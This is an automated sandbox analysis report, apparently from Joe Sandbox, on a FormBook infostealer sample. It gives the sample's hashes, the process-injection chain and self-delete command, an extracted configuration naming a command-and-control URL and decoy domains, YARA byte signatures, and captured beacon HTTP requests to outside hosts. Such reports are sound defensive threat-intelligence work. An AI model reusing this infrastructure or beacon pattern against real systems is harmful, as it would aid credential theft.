Play interactive tour

Edit tour

Analysis Report ox87DNNM8d.exe

Overview

General Information

Sample Name:	ox87DNNM8d.exe
Analysis ID:	411767
MD5:	41e38bcd6f5f3001c2e4f08ebcd2396c
SHA1:	2f3b2173d7a5a3a19e8a73d5fbfde7abc1836909
SHA256:	4e2b4396335fc6d3e6ff8c19b326f0f6342f537ba026ce1901d2122b2c7b3e4c
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

ox87DNNM8d.exe (PID: 4368 cmdline: 'C:\Users\user\Desktop\ox87DNNM8d.exe' MD5: 41E38BCD6F5F3001C2E4F08EBCD2396C)

ox87DNNM8d.exe (PID: 5656 cmdline: C:\Users\user\Desktop\ox87DNNM8d.exe MD5: 41E38BCD6F5F3001C2E4F08EBCD2396C)

explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

systray.exe (PID: 6544 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)

cmd.exe (PID: 6824 cmdline: /c del 'C:\Users\user\Desktop\ox87DNNM8d.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.panda810.com/sve/"], "decoy": ["rockouqe.com", "secureproductsolutions.net", "josephserino.com", "operationstrategy.com", "umrohalfatih.com", "humanityenlightened.com", "taylorxgroup.com", "francescopetroni.net", "anaume-kun.com", "galleryalireza.com", "alimamavn.com", "tym0769.com", "trendselection.club", "warmupspod.com", "v-work.xyz", "aclmspecialmeeting2020.com", "youporn-live.net", "germinatebio.net", "hempnseeds.com", "ezfto.com", "pengruncapital.com", "voxitor.com", "hempdivasmag.com", "everydayleadershipinstitute.com", "biking-division.com", "livingstonemoments.com", "vstarfireworks.com", "abilitybrazil.com", "gixaa.com", "kp-dental.com", "developmentignited.com", "8155a.com", "petylook.com", "agrogroupkz.com", "germsbuzzter.com", "valley-bitcoin.com", "dcsdeliveryaz.website", "elitefriendlies.com", "pinoywebtools.com", "circuleather.com", "mioskinplus.info", "tamaraog.com", "maxfelicitavideo.com", "americacivics.com", "shebawatches.com", "meisammirhashemi.com", "nelivo.com", "real-dating-clubs2.com", "poishem.directory", "geminein.club", "soundalchemyadvanced.com", "kidswrtingpadstore.com", "cya-wonder.club", "tuqof.com", "showbizpr.com", "homo-nomad.com", "bcc-cbd.com", "papayacrisp.com", "paymentink.gold", "purejoyclothing.com", "newsadvices.com", "gungalmata.com", "viewsfromthedriversseat.com", "techriew.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1c4960:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1c4bca:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1f0f80:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1f11ea:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1d06ed:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1fcd0d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1d01d9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1fc7f9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1d07ef:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1fce0f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1d0967:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1fcf87:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1c55e2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1f1c02:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1cf454:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1fba74:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1c62db:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1f28fb:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1d638f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2029af:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d7392:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1d3471:$sqlite3step: 68 34 1C 7B E1 0x1d3584:$sqlite3step: 68 34 1C 7B E1 0x1ffa91:$sqlite3step: 68 34 1C 7B E1 0x1ffba4:$sqlite3step: 68 34 1C 7B E1 0x1d34a0:$sqlite3text: 68 38 2A 90 C5 0x1d35c5:$sqlite3text: 68 38 2A 90 C5 0x1ffac0:$sqlite3text: 68 38 2A 90 C5 0x1ffbe5:$sqlite3text: 68 38 2A 90 C5 0x1d34b3:$sqlite3blob: 68 53 D8 7F 8C 0x1d35db:$sqlite3blob: 68 53 D8 7F 8C 0x1ffad3:$sqlite3blob: 68 53 D8 7F 8C 0x1ffbfb:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ox87DNNM8d.exe PID: 4368	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.ox87DNNM8d.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.ox87DNNM8d.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.ox87DNNM8d.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x12fd98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x130002:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15c3b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15c622:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13bb25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x168145:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b611:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x167c31:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13bc27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x168247:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13bd9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1683bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x130a1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x15d03a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x13a88c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x166eac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x131713:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x15dd33:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1417c7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x16dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1427ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x13e8a9:$sqlite3step: 68 34 1C 7B E1 0x13e9bc:$sqlite3step: 68 34 1C 7B E1 0x16aec9:$sqlite3step: 68 34 1C 7B E1 0x16afdc:$sqlite3step: 68 34 1C 7B E1 0x13e8d8:$sqlite3text: 68 38 2A 90 C5 0x13e9fd:$sqlite3text: 68 38 2A 90 C5 0x16aef8:$sqlite3text: 68 38 2A 90 C5 0x16b01d:$sqlite3text: 68 38 2A 90 C5 0x13e8eb:$sqlite3blob: 68 53 D8 7F 8C 0x13ea13:$sqlite3blob: 68 53 D8 7F 8C 0x16af0b:$sqlite3blob: 68 53 D8 7F 8C 0x16b033:$sqlite3blob: 68 53 D8 7F 8C
3.2.ox87DNNM8d.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.ox87DNNM8d.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.ox87DNNM8d.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x175f9:$sqlite3step: 68 34 1C 7B E1 0x1770c:$sqlite3step: 68 34 1C 7B E1 0x17628:$sqlite3text: 68 38 2A 90 C5 0x1774d:$sqlite3text: 68 38 2A 90 C5 0x1763b:$sqlite3blob: 68 53 D8 7F 8C 0x17763:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 4 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.panda810.com/sve/"], "decoy": ["rockouqe.com", "secureproductsolutions.net", "josephserino.com", "operationstrategy.com", "umrohalfatih.com", "humanityenlightened.com", "taylorxgroup.com", "francescopetroni.net", "anaume-kun.com", "galleryalireza.com", "alimamavn.com", "tym0769.com", "trendselection.club", "warmupspod.com", "v-work.xyz", "aclmspecialmeeting2020.com", "youporn-live.net", "germinatebio.net", "hempnseeds.com", "ezfto.com", "pengruncapital.com", "voxitor.com", "hempdivasmag.com", "everydayleadershipinstitute.com", "biking-division.com", "livingstonemoments.com", "vstarfireworks.com", "abilitybrazil.com", "gixaa.com", "kp-dental.com", "developmentignited.com", "8155a.com", "petylook.com", "agrogroupkz.com", "germsbuzzter.com", "valley-bitcoin.com", "dcsdeliveryaz.website", "elitefriendlies.com", "pinoywebtools.com", "circuleather.com", "mioskinplus.info", "tamaraog.com", "maxfelicitavideo.com", "americacivics.com", "shebawatches.com", "meisammirhashemi.com", "nelivo.com", "real-dating-clubs2.com", "poishem.directory", "geminein.club", "soundalchemyadvanced.com", "kidswrtingpadstore.com", "cya-wonder.club", "tuqof.com", "showbizpr.com", "homo-nomad.com", "bcc-cbd.com", "papayacrisp.com", "paymentink.gold", "purejoyclothing.com", "newsadvices.com", "gungalmata.com", "viewsfromthedriversseat.com", "techriew.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: ox87DNNM8d.exe	Virustotal: Detection: 56%	Perma Link
Source: ox87DNNM8d.exe	Metadefender: Detection: 38%	Perma Link
Source: ox87DNNM8d.exe	ReversingLabs: Detection: 65%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE

Source: 3.2.ox87DNNM8d.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: ox87DNNM8d.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: ox87DNNM8d.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: systray.pdb source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
Source:	Binary string: systray.pdbGCTL source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.282590732.0000000000CC0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe

Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 4x nop then pop edi	3_2_00416C6A
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 4x nop then pop edi	3_2_0040E42F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop edi	8_2_0017E42F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop edi	8_2_00186C6A

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.panda810.com/sve/

Source: global traffic	HTTP traffic detected: GET /sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da HTTP/1.1Host: www.dcsdeliveryaz.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sve/?8pW=2dUh0da&B6Ah=pTnyDIvt+g7sdgQmMg9D2FnTPO22hVGFgxtUPmNZyFP4G/454L1vxjiDnOTVCmVO7LzE HTTP/1.1Host: www.americacivics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sve/?B6Ah=2mSxzHKvGhdVKk9ZF/49Uvkx+tNG2gtFJsc3MZrG0ttjvP+42CyBXtijrWDGJsqiNYNw&8pW=2dUh0da HTTP/1.1Host: www.vstarfireworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	ASN Name: DREAMHOST-ASUS DREAMHOST-ASUS
Source: Joe Sandbox View	ASN Name: HKKFGL-AS-APHKKwaifongGroupLimitedHK HKKFGL-AS-APHKKwaifongGroupLimitedHK

Source: global traffic	HTTP traffic detected: GET /sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da HTTP/1.1Host: www.dcsdeliveryaz.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sve/?8pW=2dUh0da&B6Ah=pTnyDIvt+g7sdgQmMg9D2FnTPO22hVGFgxtUPmNZyFP4G/454L1vxjiDnOTVCmVO7LzE HTTP/1.1Host: www.americacivics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sve/?B6Ah=2mSxzHKvGhdVKk9ZF/49Uvkx+tNG2gtFJsc3MZrG0ttjvP+42CyBXtijrWDGJsqiNYNw&8pW=2dUh0da HTTP/1.1Host: www.vstarfireworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.secureproductsolutions.net

Source: global traffic

